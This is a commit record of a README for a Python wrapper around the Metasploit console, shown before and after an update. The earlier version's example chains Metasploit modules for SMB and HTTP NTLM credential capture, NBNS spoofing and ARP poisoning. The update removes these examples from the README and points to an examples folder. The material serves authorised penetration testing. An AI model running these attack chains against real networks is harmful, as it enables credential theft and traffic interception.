README.md, before:

msf
===========

Python classes and modules for Metasploit integration

-------------------------------------------------------------------------------

Matthew C. Jones, CPA, CISA, OSCP

IS Audits and Consulting, LLC - <http://www.isaudits.net/>

TJS Deemer Dana - <http://www.tjsdd.com>

-------------------------------------------------------------------------------
This is a work in process to simplify and expedite execution of Metasploit
commands from Python:

-a parent class for executing metasploit commands 
-subclasses for direct interaction

Current functionality is limited to parsing and executing an msfconsole command
using the msfconsole_command class:

Commands are built and piped via console similar to a resource file so multiple
handlers and exploits can be executed in a single thread
    
The "command" attribute should be a string with individual commands separated by
a semicolon; parse_msfconsole_args builds this string from individual command 
strings passed as args

For example:
	myCommand = msf.msfconsole_command("use auxiliary/server/capture/smb",
	                                   "set srvhost "+ipaddr,
	                                   "set cainpwfile "+os.path.join(tempdir,"cain"),
	                                   "set johnpwfile "+os.path.join(tempdir,"john"),
	                                   "run",
	                                   "use auxiliary/server/capture/http_ntlm",
	                                   "set srvhost "+ipaddr,
	                                   "set cainpwfile "+os.path.join(tempdir,"cain"),
	                                   "set johnpwfile "+os.path.join(tempdir,"john"),
	                                   "set uripath /",
	                                   "set srvport 80",
	                                   "run",
	                                   "use auxiliary/spoof/nbns/nbns_response",
	                                   "set spoofip "+ipaddr,
	                                   "run"
	                                   )
                               
Commands can also be appended to an existing command prior to execution
as follows:
	myCommand.add_msfconsole_args("use auxiliary/spoof/arp/arp_poisoning",
	                                    "set DHOSTS "+target_ip,
	                                    "set SHOSTS "+gateway_ip,
	                                    "set INTERFACE"+iface,
	                                    "set BIDIRECTIONAL true",
	                                    "run")

-------------------------------------------------------------------------------

This program is free software: you can redistribute it and/or modify it under 
the terms of the GNU General Public License as published by the Free Software 
Foundation, either version 3 of the License, or (at your option) any later 
version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY 
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with 
this program. If not, see <http://www.gnu.org/licenses/>.

Commit message:

add examples and update README

README.md, after:

msf
===========

Python classes and modules for Metasploit integration

-------------------------------------------------------------------------------

Matthew C. Jones, CPA, CISA, OSCP

IS Audits and Consulting, LLC - <http://www.isaudits.net/>

TJS Deemer Dana - <http://www.tjsdd.com>

-------------------------------------------------------------------------------

This is a work in process to simplify and expedite execution of Metasploit
commands from Python when it is unnecessary for more complex functionality such
as MSFRPC. Currently consists of:

-a parent class to handle executing metasploit commands 
-subclasses for direct interaction in your code

Current functionality is limited to parsing and executing an msfconsole command
using the msfconsole_command class:

Commands are built and piped via console similar to a resource file so multiple
handlers and exploits can be executed in a single thread
    
The "command" attribute should be a string with individual commands separated by
a semicolon; parse_msfconsole_args builds this string from individual command 
strings passed as args

Example usage is included in the "examples" folder

-------------------------------------------------------------------------------

This program is free software: you can redistribute it and/or modify it under 
the terms of the GNU General Public License as published by the Free Software 
Foundation, either version 3 of the License, or (at your option) any later 
version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY 
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with 
this program. If not, see <http://www.gnu.org/licenses/>.
